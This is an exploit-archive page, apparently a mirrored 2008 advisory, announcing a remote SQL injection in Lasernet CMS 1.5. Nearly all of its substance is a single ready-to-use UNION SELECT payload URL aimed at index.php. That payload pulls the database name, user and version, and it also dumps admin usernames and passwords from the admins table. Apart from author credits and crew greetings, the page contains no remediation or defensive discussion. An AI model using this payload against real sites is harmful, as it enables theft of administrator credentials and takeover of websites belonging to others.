Lasernet CMS 1.5 (new) Remote SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Lasernet CMS 1.5 (new) Remote SQL Injection Vulnerability
# Published : 2008-04-15
# Author : cO2
# Previous Title : LightNEasy SQLite / no database <= 1.2.2 Multiple Remote Vulnerabilities
# Next Title : SmallBiz 4 Seasons CMS Remote SQL Injection Vulnerability

###################################################
[~] Lasernet CMS v1.5 Remote Sql ?°nj. Vuln.
                                                                                                               
[~] Founder: cO2 [ Algeria Security Crew ]
[~] HomePage: http://www.DZ-Secure.com
[~] Greatz : To all Hackerz from Algeria & All My Friends . . .
[~] Contact: c02@Hotmail.de
[~] Exploit :
http://www.xxx.org//index.php?id=new&new=-1'%20UNION%20ALL%20SELECT%201,2,concat(database(),char(58),user(),char(58),version()),concat(username,0x3e,password),5,6,7,8,9+from+admins/*
---------------------
http://www.DZ-Secure.com
---------------------
###############################################

# www.Syue.com [2008-04-15]